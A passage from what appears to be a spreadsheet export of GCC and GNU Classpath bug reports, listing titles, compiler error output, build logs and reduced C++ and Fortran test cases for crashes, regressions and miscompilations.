/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:102:34: error: macro toupper passed 2 arguments but takes just 1
/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:106:34: error: macro tolower passed 2 arguments but takes just 1
In file included from /Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/locale:43
                 from /Users/regress/tbox/svn-gcc/libstdc++-v3/src/codecvt.cc:30:
/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:58: error: 'std::isspace' declared as an 'inline' variable
/Users/regress/tbox/native/build/powerpc-apple-darwin8.5.0/libstdc++-v3/include/bits/localefwd.h:58: error: template declaration of 'bool std::isspace'</t>
  </si>
  <si>
    <t>GCC-36460</t>
  </si>
  <si>
    <t>No space between &gt;'s not always handled in C++0x</t>
  </si>
  <si>
    <t>template 
class A {}
template 
class B {}
A &gt; x
If you leave out the space between the two &gt;'s at the definition of x it fails to compile. As far as I'm aware this should work in C++0x mode. The compiler was run with -std=c++0x.
candy@blackbox:~/atlantisos/kernel$ g++ -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ./configure --enable-languages=cc++
Thread model: posix
gcc version 4.3.1 (GCC)
candy@blackbox:~/atlantisos/kernel$ uname -a
Linux blackbox 2.6.17.13 #12 SMP PREEMPT Fri Jun 22 23:13:07 CEST 2007 i686 Intel(R) Pentium(R) D  CPU 2.66GHz GenuineIntel GNU/Linux</t>
  </si>
  <si>
    <t>peterbindels</t>
  </si>
  <si>
    <t>GCC-37431</t>
  </si>
  <si>
    <t>SPARC ACATS failures for alignment</t>
  </si>
  <si>
    <t>Worked on SVN trunk: http://gcc.gnu.org/ml/gcc-testresults/2008-08/msg02355.html
c34002a and ~100 more.  Code is being generated for a byte wide access of the stack and causing an alignment exception on an ERC32 CPU.  Compiler invocation:
sparc-rtems4.9-gnatmake -fstack-check -v -O -gnatws -O2 -I/home/joel/work-gnat/svn/gcc/gcc/testsuite/ada/acats/work-sis/support c34002a.adb -bargs -Mgnat_main -largs -B/home/joel/work-gnat/svn//bsp-install/sparc-rtems4.9/sis/lib/ -specs bsp_specs -qrtems -mcpu=cypress /home/joel/work-gnat/svn/gcc/gcc/testsuite/ada/acats/work-sis/rtems_init.o
(gdb) p/x $pc
$3 = 0x2003a98
0x02003a98 :  st  %o0 [ %fp + -89 ]
(gdb) si
Unexpected trap (0x 7) at address 0x02003A98
memory address not aligned</t>
  </si>
  <si>
    <t>CLASSPATH-23893</t>
  </si>
  <si>
    <t>JTree Accessible inner classes</t>
  </si>
  <si>
    <t>Accessible* inner classes already added to JTree but need to be fully implemented.</t>
  </si>
  <si>
    <t>GCC-28830</t>
  </si>
  <si>
    <t>FAIL: tr1/2_general_utilities/memory/shared_ptr/thread/lockfree_weaktoshared.cc</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc-4.2/objdir/./gcc/g++ -shared-libgcc -B/hom
e/dave/gnu/gcc-4.2/objdir/./gcc -nostdinc++ -L/home/dave/gnu/gcc-4.2/objdir/hppa
-linux/libstdc++-v3/src -L/home/dave/gnu/gcc-4.2/objdir/hppa-linux/libstdc++-v3/
src/.libs -B/home/dave/opt/gnu/gcc/gcc-4.2.0/hppa-linux/bin/ -B/home/dave/opt/gn
u/gcc/gcc-4.2.0/hppa-linux/lib/ -isystem /home/dave/opt/gnu/gcc/gcc-4.2.0/hppa-l
inux/include -isystem /home/dave/opt/gnu/gcc/gcc-4.2.0/hppa-linux/sys-include -g
 -O2 -D_GLIBCXX_ASSERT -ffunction-sections -fdata-sections -fmessage-length=0 -g
 -O2 -D_GNU_SOURCE -DLOCALEDIR=. -nostdinc++ -I/home/dave/gnu/gcc-4.2/objdir/h
ppa-linux/libstdc++-v3/include/hppa-linux -I/home/dave/gnu/gcc-4.2/objdir/hppa-l
inux/libstdc++-v3/include -I/home/dave/gnu/gcc-4.2/gcc/libstdc++-v3/libsupc++ -I
/home/dave/gnu/gcc-4.2/gcc/libstdc++-v3/include/backward -I/home/dave/gnu/gcc-4.
2/gcc/libstdc++-v3/testsuite/util testsuite_abi.o testsuite_allocator.o testsuit
e_character.o testsuite_hooks.o twister_rand_gen.o verified_cmd_line_input.o pro
g_bar.o dbg_ex_allocator_base.o elapsed_timer.o -Wl--gc-sections /home/dave/gnu
/gcc-4.2/gcc/libstdc++-v3/testsuite/tr1/2_general_utilities/memory/shared_ptr/th
read/lockfree_weaktoshared.cc   -pthread  -lm   -o ./lockfree_weaktoshared.exe
  (timeout = 600)
/tmp/ccljP9Ft.o: In function `std::tr1::_Sp_counted_base&lt;(std::tr1::_Lock_policy
)0&gt;::add_ref_lock()':
/home/dave/gnu/gcc-4.2/objdir/hppa-linux/libstdc++-v3/include/tr1/boost_shared_p
tr.h:259: undefined reference to `__sync_bool_compare_and_swap_4'
/home/dave/gnu/gcc-4.2/objdir/hppa-linux/libstdc++-v3/include/tr1/boost_shared_p
tr.h:259: undefined reference to `__sync_bool_compare_and_swap_4'
collect2: ld returned 1 exit status
compiler exited with status 1
output is:
/tmp/ccljP9Ft.o: In function `std::tr1::_Sp_counted_base&lt;(std::tr1::_Lock_policy
)0&gt;::add_ref_lock()':
/home/dave/gnu/gcc-4.2/objdir/hppa-linux/libstdc++-v3/include/tr1/boost_shared_p
tr.h:259: undefined reference to `__sync_bool_compare_and_swap_4'
/home/dave/gnu/gcc-4.2/objdir/hppa-linux/libstdc++-v3/include/tr1/boost_shared_p
tr.h:259: undefined reference to `__sync_bool_compare_and_swap_4'
collect2: ld returned 1 exit status
FAIL: tr1/2_general_utilities/memory/shared_ptr/thread/lockfree_weaktoshared.cc
(test for excess errors)
Excess errors:
/home/dave/gnu/gcc-4.2/objdir/hppa-linux/libstdc++-v3/include/tr1/boost_shared_p
tr.h:259: undefined reference to `__sync_bool_compare_and_swap_4'
/home/dave/gnu/gcc-4.2/objdir/hppa-linux/libstdc++-v3/include/tr1/boost_shared_p
tr.h:259: undefined reference to `__sync_bool_compare_and_swap_4'
collect2: ld returned 1 exit status
WARNING: tr1/2_general_utilities/memory/shared_ptr/thread/lockfree_weaktoshared.
cc compilation failed to produce executable
extra_tool_flags are:
 -pthread</t>
  </si>
  <si>
    <t>GCC-10929</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] -Winline warns about functions for which no definition is visible</t>
  </si>
  <si>
    <t>g++-3.3 -Winline generates warnings for functions it cannot inline
that it shouldn't even try to inline because they are neither declared 
as inline nor defined in the class body.
Save the following as main.cpp
/* snip */
#include foo.hpp
int main(intchar)
{
   return foo()
}
/* snip */
Save the following as foo.hpp
/* snip */
int foo(void)
/* snip */
Save the following as foo.cpp
/* snip */
int foo(void)
{
   return 0
}
/* snip */
Then compile with
$ g++-3.3 -O3 -Winline main.cpp new.cpp
Result is a useless warning that int foo(void) could not be inlined. 
(Correct but supposed not to be inline-able).</t>
  </si>
  <si>
    <t>GCC-1626</t>
  </si>
  <si>
    <t>Failure during 'make install' (AIX 4.3.3)</t>
  </si>
  <si>
    <t>Failure messages during 'make install'
Using GCC 2.95.2
Make GNU 3.79.1
IBM AIX 4.3.3
Since I did the 'make bootstrap' I seemed to be committed to getting this to work.  It appears that the GNU 'make bootstrap' updates code in all of the various c files throughout the server.
Going back to my IBM C compiler v 3.6.6.6 seems to be impossible.
Help!!!?
Release:
GCC  2.95.2 AIX v4.3.3
Environment:
IBM RS6000 PowerServer 550
AIX v4.3.3
How-To-Repeat:
Start with clean hard drives install AIX v4.3.3.  It does not come with a compiler.  Download IBM C compiler v3.6.6.6 and go through the try and buy licensing and build process.  Install the GNU Make v. 3.79.1 and install per instructions.  Download GNU C version 2.95.2.  Follow the GNU installation instructions.  Do not provide any paramters.</t>
  </si>
  <si>
    <t>GCC-83236</t>
  </si>
  <si>
    <t>Did you mean suggestions maybe shouldn't offer implementation-private names</t>
  </si>
  <si>
    <t>On Linux/glibc
$ cat &gt; test.c &lt;&lt;EOF
#include 
ino_t inode
EOF
$ gcc -std=c89 -fsyntax-only test.c
test.c:2:1: error: unknown type name â€˜ino_tâ€™ did you mean â€˜__ino_tâ€™?
 ino_t inode
 ^~~~~
 __ino_t
$ gcc --version
gcc (Debian 7.2.0-16) 7.2.0
__ino_t is an implementation detail of glibc's headers and application programmers shouldn't be encouraged to use it.
To first order I don't think any implementation-namespace names (/^_[_A-Z]/) should be offered as suggestions.  To second order they could be suggested when the unknown symbol is itself in the implementation namespace or when the suggestion is a _documented_ impl-namespace symbol like __DATE__ or _IOFBF or _Bool.</t>
  </si>
  <si>
    <t>GCC-47878</t>
  </si>
  <si>
    <t>[4.6 Regression] 187.facerec miscompares</t>
  </si>
  <si>
    <t>I see miscompares with -O3 and -O2 -ffast-math.
Last known good r170390 first known bad r170432.</t>
  </si>
  <si>
    <t>GCC-52088</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE in delete with template convertion operator</t>
  </si>
  <si>
    <t>GCC ICEs with the following testcase
---- testcase.C ----
struct S
{
	template 
	operator T *() { return 0 }
}
int main()
{
	S s
	delete s
}
---
GNU C++ (GCC) version 4.7.0 20120123 (experimental) [trunk revision 183458] (x86_64-unknown-linux-gnu)
t7881.cc: In function â€˜int main()â€™:
t7881.cc:10:12: warning: possible problem detected in invocation of delete operator: [enabled by default]
t7881.cc:10:12: warning: invalid use of template type parameter â€˜Tâ€™ [enabled by default]
t7881.cc:10:12: note: neither the destructor nor the class-specific operator delete will be called even if they are declared when the class is defined
t7881.cc:10:12: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-40357</t>
  </si>
  <si>
    <t>[4.5 Regression] compiler hang for C++ code</t>
  </si>
  <si>
    <t>I just tried to compile the Suse Factory package xalan-c-1.10.0-1.3
with the GNU gcc version 4.5 snapshot 20090604.
The compiler hung for over 15 minutes on an idle machine.
Preprocessed source code attached. No flags required.
Compilation using gcc 4.3.2 takes seconds.</t>
  </si>
  <si>
    <t>GCC-24469</t>
  </si>
  <si>
    <t>Possible race condition in mt_allocator causing SIGSEGV</t>
  </si>
  <si>
    <t>In function deallocate(pointer _p size_type __n) there is no synchronization on __bin._M_used[__block-&gt;_M_thread_id] variable. During block deallocation current thread decrements other threads _M_used variable without a lock.
This can result in undefined value of _M_used variable which than is used to calculate __remove size. SIGSEGV shows up in following code:
while (__remove-- &gt; 0)
	__tmp = __tmp-&gt;_M_next
Since __remove variable might have undefined value code may surpass the end of the list.
Increment and decrement operations are not atomic and should be placed in critical section to avoid such situation.
Bug is very hard to reproduce. There must be many threads allocating memory and deallocating other threads memory.
I have found this bug by code inspection - not gdb.</t>
  </si>
  <si>
    <t>l_heldt</t>
  </si>
  <si>
    <t>GCC-14637</t>
  </si>
  <si>
    <t>[lno] [merge] wrong code with -O2 -finline-functions</t>
  </si>
  <si>
    <t>xgcc (GCC) 3.5-tree-ssa-lno 20040318 (merged 20040221) get an ICE at while doing
profiledbootstrap (after stage1 while compiling libgcc). Configured with
../gcc/configure --program-suffix=-3.5-tree-ssa-lno --enable-languages=c
--with-arch=athlon-xp --disable-checking --disable-werror
Bootstrap started with
make CFLAGS='-O2 -fomit-frame-pointer -fweb' STAGE1_CFLAGS='-O2
-fomit-frame-pointer -fweb' BOOT_CFLAGS='-O3 -fomit-frame-pointer
-fno-rename-registers' profiledbootstrap
[snip]
./xgcc -B./ -B/usr/local/i686-pc-linux-gnu/bin/ -isystem
/usr/local/i686-pc-linux-gnu/include -isystem
/usr/local/i686-pc-linux-gnu/sys-include
-L/usr/local/src/gcc/lno/build/gcc/../ld -O2  -DIN_GCC    -W -Wall
-Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition
 -isystem ./include  -fPIC -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2
-D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I../../gcc/gcc -I../../gcc/gcc/.
-I../../gcc/gcc/../include -I../../gcc/gcc/../libbanshee/libcompat
-I../../gcc/gcc/../libbanshee -I../../gcc/gcc/../libbanshee/points-to  
-DL_divdi3 -c ../../gcc/gcc/libgcc2.c -fexceptions -fnon-call-exceptions -o
libgcc/./_divdi3.o
../../gcc/gcc/libgcc2.c: In function `__divdi3':
../../gcc/gcc/libgcc2.c:1014: internal compiler error: in cgraph_remove_edge at
cgraph.c:292
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [libgcc/./_divdi3.o] ÐžÑˆÐ¸Ð±ÐºÐ° 1
make[3]: Leaving directory `/usr/local/src/gcc/lno/build/gcc'
make[2]: *** [libgcc.a] ÐžÑˆÐ¸Ð±ÐºÐ° 2
make[2]: Leaving directory `/usr/local/src/gcc/lno/build/gcc'
make[1]: *** [stageprofile_build] ÐžÑˆÐ¸Ð±ÐºÐ° 2
make[1]: Leaving directory `/usr/local/src/gcc/lno/build/gcc'
make: *** [profiledbootstrap] ÐžÑˆÐ¸Ð±ÐºÐ° 2</t>
  </si>
  <si>
    <t>GCC-3381</t>
  </si>
  <si>
    <t>explicit template instantations fail with absolutely qualified names</t>
  </si>
  <si>
    <t>The code below shows how explicit template instantations
fail when the name of the template starts with a
reference to the global namespace ::.
explicit-instantiation-absqual.cc:8: parse error before `' token
Versions 2.95.3 and 3.1 20010617 show the same error.
Release:
gcc version 3.0
Environment:
Linux 2.4.4
glibc 2.2.3
How-To-Repeat:
namespace N {
  template
  class A { }
}
// template class N::A   // this works (by itself)
template class ::N::A    // but this doesn't</t>
  </si>
  <si>
    <t>GCC-31863</t>
  </si>
  <si>
    <t>[4.2 Regression] g++-4.1: out of memory with -O1/-O2</t>
  </si>
  <si>
    <t xml:space="preserve">
	We tried to move from gcc-4.0 to gcc-4.1 and now we have problem - our
        project fails to compile with optimization. We use a lot of templates
        particulary Loki::TypeList.
        Please see attached test.cc. It compiles with g++-4.0 using ~180Mb of
        memory but with g++-4.1 it eats ~1.5Gb and then say that it can't
        allocate memory:
        jk@jk:~/tmp/gcc% g++-4.1 -O2 -g test.cc
        cc1plus: out of memory allocating 2098751636 bytes after a total of
        11571200 bytes
        jk@jk:~/tmp/gcc%
        It compiles well without optimization.
        This bug report has been sent to Debian BTS #411234
Environment:
System: Linux jk 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux
Architecture: i686
host: i486-pc-linux-gnu
build: i486-pc-linux-gnu
target: i486-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.1 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --with-tune=i686 --enable-checking=release i486-linux-gnu
How-To-Repeat:
test.cc:
namespace Loki
{
    class NullType {}
    template 
    struct Typelist
    {
       typedef T Head
       typedef U Tail
    }
    namespace TL
    {
        template
        &lt;
                typename T1 = NullType typename T2 = NullType typename T3 = NullType
                typename T4 = NullType typename T5 = NullType typename T6 = NullType
                typename T7 = NullType typename T8 = NullType typename T9 = NullType
                typename T10 = NullType typename T11 = NullType typename T12 = NullType
                typename T13 = NullType typename T14 = NullType typename T15 = NullType
                typename T16 = NullType typename T17 = NullType typename T18 = NullType
                typename T19 = NullType typename T20 = NullType typename T21 = NullType
                typename T22 = NullType typename T23 = NullType typename T24 = NullType
                typename T25 = NullType typename T26 = NullType typename T27 = NullType
                typename T28 = NullType typename T29 = NullType typename T30 = NullType
                typename T31 = NullType typename T32 = NullType typename T33 = NullType
                typename T34 = NullType typename T35 = NullType typename T36 = NullType
                typename T37 = NullType typename T38 = NullType typename T39 = NullType
                typename T40 = NullType
        &gt;
        struct MakeTypelist
        {
        private:
            typedef typename MakeTypelist
            &lt;
                T2  T3  T4 
                T5  T6  T7 
                T8  T9  T10
                T11 T12 T13
                T14 T15 T16
                T17 T18 T19
                T20 T21 T22
                T23 T24 T25
                T26 T27 T28
                T29 T30 T31
                T32 T33 T34
                T35 T36 T37
                T38 T39 T40
            &gt;
            ::Result TailResult
        public:
            typedef Typelist Result
        }
        template
        struct MakeTypelist
        {
            typedef NullType Result
        }
    }
}
template 
class Factory
template 
struct Context
{
    typedef Key KeyType
    enum
    {
        isWrite = iW
    }
}
namespace detail
{
template 
class CreatorUnitBaseImpl
{
public:
    typedef Context Context
private:
    typedef void*(CreatorUnitBaseImpl::*CreateFun)(Context
    CreateFun createFun_
protected:
    virtual void* createUninitialized () = 0
    template 
    void* createImpl (Context&amp; ctx unsigned&amp; ver const Key&amp; k)
    {
        return createUninitialized()
    }
private:
    CreatorUnitBaseImpl()
public:
    template 
    CreatorUnitBaseImpl (Value*) :
        createFun_( &amp;CreatorUnitBaseImpl::template createImpl )
    {
    }
    virtual ~CreatorUnitBaseImpl () {}
    CreatorUnitBaseImpl(const CreatorUnitBaseImpl&amp; s)
        : createFun_(s.createFun_)
    {
    }
    CreatorUnitBaseImpl&amp; operator=(const CreatorUnitBaseImpl&amp; s)
    {
        createFun_ = s.createFun_
        return *this
    }
    void* create (Context&amp; ctx unsigned&amp; ver const Key&amp; k)
    {
        return (this-&gt;*createFun_)(ctx ver k)
    }
}
template 
class Creator : protected CreatorUnitBaseImpl protected CreatorUnitBaseImpl
{
public:
    typedef void* (*CreatorFun) ()
private:
    CreatorFun fun_
protected:
    virtual void* createUninitialized ()
    {
        if (fun_)
            return (*fun_)()
        return 0
    }
private:
    Creator ()
public:
    template 
    Creator (CreatorFun f Value*) :
        CreatorUnitBaseImpl((Value*)0)
        CreatorUnitBaseImpl((Value*)0)
        fun_(f)
    {
    }
    Creator(const Creator&amp; s) :
        CreatorUnitBaseImpl(s)
        CreatorUnitBaseImpl(s)
        fun_(s.fun_)
    {
    }
    Creator&amp; operator=(const Creator&amp; s)
    {
        CreatorUnitBaseImpl::operator=(s)
        CreatorUnitBaseImpl::operator=(s)
        fun_ = s.fun_
        return *this
    }
    virtual ~Creator ()
    {
    }
    template 
    void* createObject (Context&amp; ctx unsigned&amp; ver const Key&amp; k)
    {
        void* r = CreatorUnitBaseImpl::create(ctx ver k)
        return r
    }
}
}
template 
class Factory
{
public:
    typedef Key KeyType
    typedef void* (*CreatorFun) ()
    typedef detail::Creator Creator
public:
    Factory () {}
    ~Factory () {}
    template 
    bool registerCreator (const Key&amp; k CreatorFun fun)
    {
        return true
    }
    template 
    void* createObject (const Key&amp; k Context&amp; ctx unsigned&amp; ver)
    {
        return 0
    }
}
template 
struct ClassSpec
{
    typedef Key KeyType
    typedef Base BaseType
    enum {KeyValue = key}
}
template 
class Serializer
template 
class Serializer &gt;
    : public virtual Factory
{
    typedef Key KeyType
    typedef Base BaseType
    enum {KeyValue = key}
    typedef Factory Inherited
    typedef Serializer &gt; SelfType
    static void* create ()
    {
        return (void*) (new BaseType)
    }
public:
    Serializer()
    {
        Inherited::template registerCreator(
                KeyValue
    }
}
template 
class Serializer &gt;:
    public Serializer
{
}
template 
class Serializer &gt;:
    public virtual Serializer
    public virtual Serializer
{
}
template 
class Serializer : public virtual Factory
{
}
typedef unsigned KeyType
typedef Factory FactoryType
typedef KeyType Key
struct A001
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 1 }
    static const char* className () {return A001}
}
struct A002
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 2 }
    static const char* className () {return A002}
}
struct A003
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 3 }
    static const char* className () {return A003}
}
struct A004
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 4 }
    static const char* className () {return A004}
}
struct A005
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 5 }
    static const char* className () {return A005}
}
struct A006
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 6 }
    static const char* className () {return A006}
}
struct A007
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 7 }
    static const char* className () {return A007}
}
struct A008
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 8 }
    static const char* className () {return A008}
}
struct A009
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 9 }
    static const char* className () {return A009}
}
struct A010
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 10 }
    static const char* className () {return A010}
}
struct A011
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 11 }
    static const char* className () {return A011}
}
struct A012
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 12 }
    static const char* className () {return A012}
}
struct A013
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 13 }
    static const char* className () {return A013}
}
struct A014
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 14 }
    static const char* className () {return A014}
}
struct A015
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 15 }
    static const char* className () {return A015}
}
struct A016
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 16 }
    static const char* className () {return A016}
}
struct A017
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 17 }
    static const char* className () {return A017}
}
struct A018
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 18 }
    static const char* className () {return A018}
}
struct A019
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 19 }
    static const char* className () {return A019}
}
struct A020
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 20 }
    static const char* className () {return A020}
}
struct A021
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 21 }
    static const char* className () {return A021}
}
struct A022
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 22 }
    static const char* className () {return A022}
}
struct A023
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 23 }
    static const char* className () {return A023}
}
struct A024
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 24 }
    static const char* className () {return A024}
}
struct A025
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 25 }
    static const char* className () {return A025}
}
struct A026
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 26 }
    static const char* className () {return A026}
}
struct A027
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 27 }
    static const char* className () {return A027}
}
struct A028
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 28 }
    static const char* className () {return A028}
}
struct A029
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 29 }
    static const char* className () {return A029}
}
struct A030
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 30 }
    static const char* className () {return A030}
}
struct A031
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 31 }
    static const char* className () {return A031}
}
struct A032
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 32 }
    static const char* className () {return A032}
}
struct A033
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 33 }
    static const char* className () {return A033}
}
struct A034
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 34 }
    static const char* className () {return A034}
}
struct A035
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 35 }
    static const char* className () {return A035}
}
struct A036
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 36 }
    static const char* className () {return A036}
}
struct A037
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 37 }
    static const char* className () {return A037}
}
struct A038
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 38 }
    static const char* className () {return A038}
}
struct A039
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 39 }
    static const char* className () {return A039}
}
struct A040
{
    template 
    bool serialize(Context&amp; ctx unsigned&amp; ver)
    {
        return true
    }
    static Key classId() { return 40 }
    static const char* className () {return A040}
}
Factory&amp; getInstance()
{
    static Serializer&lt;Key
        Loki::TL::MakeTypelist&lt;
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
            ClassSpec
        &gt;::Result
    &gt; instance
    return instance
}
int main ()
{
    return 0
}</t>
  </si>
  <si>
    <t>GCC-37852</t>
  </si>
  <si>
    <t>[graphite] ICE in gbb_loop_index at graphite.h:252</t>
  </si>
  <si>
    <t>gfortran -floop-block -O2 final_test_fpu.f90
final_test_fpu.f90: In function 'gauss':
final_test_fpu.f90:7: internal compiler error: in gbb_loop_index at graphite.h:252
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This was tested on the graphite branch. The reduced testcase from polyhedron
benchmark is attached.
-Mitul</t>
  </si>
  <si>
    <t>GCC-78800</t>
  </si>
  <si>
    <t>[OOP] ICE in compare_parameter at fortran/interface.c:2246</t>
  </si>
  <si>
    <t>With invalid code down to at least 4.8 :
(bailed out with official releases 5 6)
$ cat z1.f90
program p
   type t
   end type
   class(*) :: z
   call s(z)
contains
   subroutine s(x)
      type(t) :: x
   end
end
$ gfortran-7-20161211 z1.f90
z1.f90:4:16:
    class(*) :: z
                1
Error: CLASS variable 'z' at (1) must be dummy allocatable or pointer
f951: internal compiler error: Segmentation fault
0xc4e79f crash_signal
        ../../gcc/toplev.c:333
0x69dc54 compare_parameter
        ../../gcc/fortran/interface.c:2246
0x69e57b compare_actual_formal
        ../../gcc/fortran/interface.c:2916
0x6a068d gfc_procedure_use(gfc_symbol* gfc_actual_arglist** locus*)
        ../../gcc/fortran/interface.c:3655
0x6fe985 resolve_specific_s0
        ../../gcc/fortran/resolve.c:3298
0x6fe985 resolve_specific_s
        ../../gcc/fortran/resolve.c:3318
0x6fe985 resolve_call
        ../../gcc/fortran/resolve.c:3472
0x6fb8c9 gfc_resolve_code(gfc_code* gfc_namespace*)
        ../../gcc/fortran/resolve.c:11010
0x6fdee2 resolve_codes
        ../../gcc/fortran/resolve.c:16056
0x6fdfde gfc_resolve(gfc_namespace*)
        ../../gcc/fortran/resolve.c:16091
0x6e82ba resolve_all_program_units
        ../../gcc/fortran/parse.c:5947
0x6e82ba gfc_parse_file()
        ../../gcc/fortran/parse.c:6194
0x72c312 gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:202</t>
  </si>
  <si>
    <t>GCC-23411</t>
  </si>
  <si>
    <t>[data deps] Distance on outer loops for self output deps</t>
  </si>
  <si>
    <t>The most frequent case that shows up when bootstrapping autovect branch 
with BOOT_CFLAGS=-O2 -fcheck-data-deps is the following:
Dist vectors from the first dependence analyzer:
   1    0 
Omega dist vectors are not the same:
   0    0 
Data dependence relation is:
(Data Dep: 
  access_fn_A: {0 + 1}_3
  access_fn_B: {0 + 1}_3
 (subscript 
  iterations_that_access_an_element_twice_in_A: 0
  last_conflict: scev_not_known
  iterations_that_access_an_element_twice_in_B: 0
  last_conflict: scev_not_known
  (Subscript distance: 0
  )
 )
  distance_vect:      0    0 
  direction_vect:     =    =
)
This is caused by a loop containing a data ref like the following:
loop_2
  loop_3
    A[{0 + 1}_3] = ...
  endloop_3
endloop_2
For this pattern tree-data-ref.c says the following:
  /* There is a distance of 1 on all the outer loops: 
     Example: there is a dependence of distance 1 on loop_1 for the array A.
     | loop_1
     |   A[5] = ...
     | endloop
  */
But now that Omega says that dist is (0 0) I'm not sure anymore whether
this is the standard meaning of distance vectors.
Allen&amp;Kennedy book states:
Definition 2.9. Suppose that there is a dependence from statement
S1 on iteration i of a loop nest and statement S2 on iteration j then
the dependence distance vector d(ij) is defined as a vector of
length n such that d(ij) = j - i.</t>
  </si>
  <si>
    <t>GCC-6315</t>
  </si>
  <si>
